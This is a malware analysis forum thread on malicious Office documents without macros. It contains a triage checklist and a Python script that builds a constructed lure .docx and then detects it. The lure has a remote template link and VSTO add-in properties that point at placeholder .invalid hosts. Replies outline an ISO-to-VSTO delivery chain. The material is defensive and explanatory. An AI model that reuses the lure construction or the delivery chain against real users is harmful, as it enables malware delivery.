Malware Analysis [Video] Malicious MS Office Files Without Macros

struppigel
Thread author
Apr 9, 2020
Some people believe that MS Office Macros are the only way to run malicious code in office files, so files without them are safe.
I also heard ".docx are just a bunch of XML, so it can't do anything bad."

Both statements are wrong. We take a look at two techniques that load malware without Macros in the following video. I also provide a checklist that analysts can use to make sure a file is really clean.

Samples are available on Trainings Samples

For those of you who just want the checklist, here it is. It is designed such that even new malware loading techniques shouldn't be missed that easily:

  • Open in MS Office and check content for social engineering and phishing, often it tells you what to enable or where to click
  • Does the sample show interesting behavior in a sandbox?
  • Is the metadata consistent? If it looks suspicious, take extra time to analyze it
  • Extract IPs, URLs, emails and other plaintext indicators, e.g., using regex or binary refinery
  • For non-text formats: Roughly check the file in a hex editor and create a strings listing, watch out for embedded files and anything that stands out
  • Scan with a Yara rule set, start with Yara-Forge if you don't have your own, add detections for new techniques there
  • Check for Macros, VBA Stomping, VSTO Add-ins, External Templates
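A static triage script for the checklist above, added here as a worked example (it is not code from the post, the video or the Trainings Samples). It constructs a small .docx in memory with placeholder .invalid hostnames, made-up timestamps and property values, then walks the ZIP container for the items the checklist names: an external template relationship, embedded objects, vbaProject.bin, the custom document properties a VSTO document-level customization carries, plaintext URLs, a metadata inconsistency and lure text. A clean variant of the same package is included so the negative case is visible too.

```python
"""Static triage of a .docx (OOXML ZIP) for non-macro loading techniques.

Added example, not code from the original post or its sample set. It builds a
constructed .docx in memory (placeholder .invalid hostnames, no real malware)
and walks the container for the items on the checklist."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from datetime import datetime

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
CUSTOM_NS = "http://schemas.openxmlformats.org/officeDocument/2006/custom-properties"
DCTERMS_NS = "http://purl.org/dc/terms/"
URL_RE = re.compile(rb"https?://[^\s\"'<>|]+")
SCHEMA_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com", "purl.org", "www.w3.org")  # namespace URIs, not IOCs
LURE_RE = re.compile(r"enable (editing|content|macros)|protected view", re.I)

# Constructed sample parts (assumption: hostnames, timestamps and property values are made up for the demo).
CONSTRUCTED_PARTS = {
    "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
    "_rels/.rels": f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>',
    "word/document.xml": f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>This document is protected. Enable Editing to view it.</w:t></w:r></w:p></w:body></w:document>',
    # settings.xml names the attached template by relationship id; its .rels resolves that id to an external URL
    "word/settings.xml": f'<w:settings xmlns:w="{W_NS}" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>',
    "word/_rels/settings.xml.rels": f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://template.example.invalid/update.dotm" TargetMode="External"/></Relationships>',
    # core.xml whose modified timestamp precedes its created timestamp (an edited or forged document)
    "docProps/core.xml": '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Accounting</dc:creator><cp:lastModifiedBy>Administrator</cp:lastModifiedBy><dcterms:created xsi:type="dcterms:W3CDTF">2024-03-02T10:00:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-01T08:00:00Z</dcterms:modified></cp:coreProperties>',
    # VSTO document-level customization: _AssemblyName "*" and _AssemblyLocation pointing at the deployment manifest
    "docProps/custom.xml": f'<Properties xmlns="{CUSTOM_NS}" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><property pid="2" name="_AssemblyName"><vt:lpwstr>*</vt:lpwstr></property><property pid="3" name="_AssemblyLocation"><vt:lpwstr>http://addin.example.invalid/Payload.vsto</vt:lpwstr></property></Properties>',
}


def build_constructed_docx(parts=CONSTRUCTED_PARTS) -> bytes:
    """Pack the parts into a ZIP the way Office stores a .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


def clean_variant(parts=CONSTRUCTED_PARTS) -> dict:
    """Same package without the template link, VSTO properties, lure text or odd timestamps."""
    dropped = ("word/settings.xml", "word/_rels/settings.xml.rels", "docProps/custom.xml")
    clean = {k: v for k, v in parts.items() if k not in dropped}
    clean["word/document.xml"] = f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>'
    clean["docProps/core.xml"] = parts["docProps/core.xml"].replace("2024-03-02T10:00:00Z", "2024-02-28T10:00:00Z")
    return clean


def triage_docx(data: bytes) -> dict:
    """Walk the container once and collect what an analyst should look at first."""
    out = {"external_relationships": [], "attached_template": None, "has_vba": False,
           "embedded_parts": [], "vsto": {}, "urls": set(), "metadata_warnings": [], "lure_text": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            for url in URL_RE.findall(blob):  # plaintext indicators from every part, schema URIs filtered out
                url = url.decode("ascii", "replace")
                if not any(host in url for host in SCHEMA_HOSTS):
                    out["urls"].add(url)
            if name.lower().endswith("vbaproject.bin"):  # presence only; VBA stomping needs p-code vs. source
                out["has_vba"] = True
            if "/embeddings/" in name:  # OLE objects and packaged files live here
                out["embedded_parts"].append(name)
            if name.endswith(".rels"):  # TargetMode="External" means the part is fetched from outside the package
                for rel in ET.fromstring(blob).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        out["external_relationships"].append((name, rtype, rel.get("Target")))
                        if rtype == "attachedTemplate":
                            out["attached_template"] = rel.get("Target")
            elif name == "docProps/custom.xml":
                for prop in ET.fromstring(blob).iter(f"{{{CUSTOM_NS}}}property"):
                    if prop.get("name") in ("_AssemblyName", "_AssemblyLocation"):
                        out["vsto"][prop.get("name")] = "".join(prop.itertext()).strip()
            elif name == "docProps/core.xml":
                root, stamps = ET.fromstring(blob), {}
                for tag in ("created", "modified"):
                    el = root.find(f"{{{DCTERMS_NS}}}{tag}")
                    if el is not None and el.text:
                        stamps[tag] = datetime.fromisoformat(el.text.strip().replace("Z", "+00:00"))
                if len(stamps) == 2 and stamps["modified"] < stamps["created"]:
                    out["metadata_warnings"].append("modified timestamp precedes created timestamp")
            elif name == "word/document.xml":
                text = " ".join(t.text or "" for t in ET.fromstring(blob).iter(f"{{{W_NS}}}t"))
                out["lure_text"] = bool(LURE_RE.search(text))
    out["urls"] = sorted(out["urls"])
    return out


def is_suspicious(findings: dict) -> bool:
    """Any hit is a reason to keep analysing, not proof of malice."""
    keys = ("attached_template", "vsto", "has_vba", "embedded_parts", "lure_text", "metadata_warnings")
    return any(findings[k] for k in keys)


if __name__ == "__main__":
    for label, parts in (("constructed lure", CONSTRUCTED_PARTS), ("clean variant", clean_variant())):
        result = triage_docx(build_constructed_docx(parts))
        print(label, "->", "suspicious" if is_suspicious(result) else "nothing flagged", result)
```

Run it as a script to see both verdicts. Two caveats match the checklist: the vbaProject.bin check reports presence only, so VBA stomping still needs a p-code versus source comparison (olevba or pcodedmp); and the VSTO check looks for the _AssemblyName and _AssemblyLocation custom properties that a document-level customization carries, which is exactly the field an attacker points at a remote deployment manifest, so a hit there is worth the same attention as an external template.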
 

Good post. Those two assumptions are definitely unsafe.

A .docx file is usually an Open XML container with XML parts, but that does not mean it is harmless. “Just XML” only describes the file structure, not the full attack surface around how Office processes relationships, external references, templates, embedded content, and other document features.

Why “no macros = safe” is wrong

  • Office documents can still be used for phishing, credential capture, or malware delivery without VBA macros.
  • Some techniques rely on Office features outside classic macros, such as remote templates, embedded objects, links, add-ins, or other document components.
  • Even when direct code execution is not present, a document can still be malicious in the broader sense if it tricks the user into opening a payload, visiting a hostile URL, or disclosing credentials.

Why “.docx is only XML” is also misleading

  • .docx files are ZIP-based containers with multiple internal parts, relationships, and metadata.
  • Those relationships can reference internal or external resources.
  • The security risk often comes from how Office interprets the package, not from XML being “executable” by itself.
  • Attackers also abuse embedded files, remote content, and user interaction prompts rather than relying only on scriptable code.

Your checklist is solid, especially for triage

The strongest part is that it does not stop at “macro present or not.” That is the right mindset.

A few points I would especially emphasize:

  • User-facing content matters. Social engineering text is often the main payload delivery mechanism.
  • Metadata and relationships are worth checking closely, especially external references.
  • Strings, indicators, and embedded content review can reveal a lot before deeper reversing starts.
  • YARA is useful for scale, but it should support analysis rather than replace it.
  • Sandboxing can help, although Office behavior may depend heavily on prompts, network access, version differences, and protected view conditions.

One important nuance

It is best not to frame a document as “clean” solely because no obvious active content was found. In practice, a document is only “clean” to the extent that the analysis covered the relevant features and no suspicious behavior or delivery mechanism was identified. That distinction matters because Office has a long history of feature abuse beyond straightforward macro execution.

Practical takeaway

  • Treat macro checks as only one part of document analysis.
  • Inspect structure, relationships, embedded objects, indicators, and user-deception content.
  • Use dynamic testing carefully, because document behavior can vary by environment.
  • If certainty is required, combine static review, controlled detonation, and community or peer validation.

The main takeaway is simple: absence of macros does not equal safety, and a .docx being XML-based does not make it harmless.
 
Some people believe that MS Office Macros are the only way to run malicious code in office files, so files without them are safe.
I also heard ".docx are just a bunch of XML, so it can't do anything bad."

Both statements are wrong. We take a look at two techniques that load malware without Macros in the following video. I also provide a checklist that analysts can use to make sure a file is really clean.
I am not sure who the people saying that are…?

How the macro is stored is not important; it allows file creation, internet access (including but not limited to APIs and so on), parsers, LOLBin spawning and so on.

You can achieve a lot of what other languages (C++, .NET and so on) allow, with the only difference that VBA is single-threaded (though this as well can be mitigated if needed).
 
I think running VSTO add-ins requires the VSTO runtime to be installed first.

  • User mounts ISO
  • setup.exe runs (manually or via autorun)
  • VSTO runtime installer runs silently
  • DOCX document opens automatically
  • Office loads the VSTO add-in
 
Doesn't Defender Application Guard sandbox documents upon execution?

If I recall correctly, this works only for files with MotW that are located in insecure locations.
So, if the VSTO runtime is already installed, a document with MotW will be opened in MDAG (the add-in fails). Documents without MotW will be opened normally.
 
Even with add-ins disabled in Office settings and internet access for Office components blocked by the firewall?

Why is this relevant for malware analysis? To determine if something is malicious or not, it does not matter if it is blocked. It's still malicious.

I have watched it; unfortunately, not all people with knowledge are eligible for teaching.

Would you care to tell me what I can improve?
 
Why is this relevant for malware analysis? To determine if something is malicious or not, it does not matter if it is blocked. It's still malicious.
As a home user, I care more about how I could get infected than about whether the sample is malicious or not.
Would you care to tell me what I can improve?
Educating non-professionals on field visit requirements is completely different from lecturing fellow physicians.
 
As a home user, I care more about how I could get infected than about whether the sample is malicious or not.

Educating non-professionals on field visit requirements is completely different from lecturing fellow physicians.

I agree with both, the channel is not for home users but for professional and hobby malware analysts.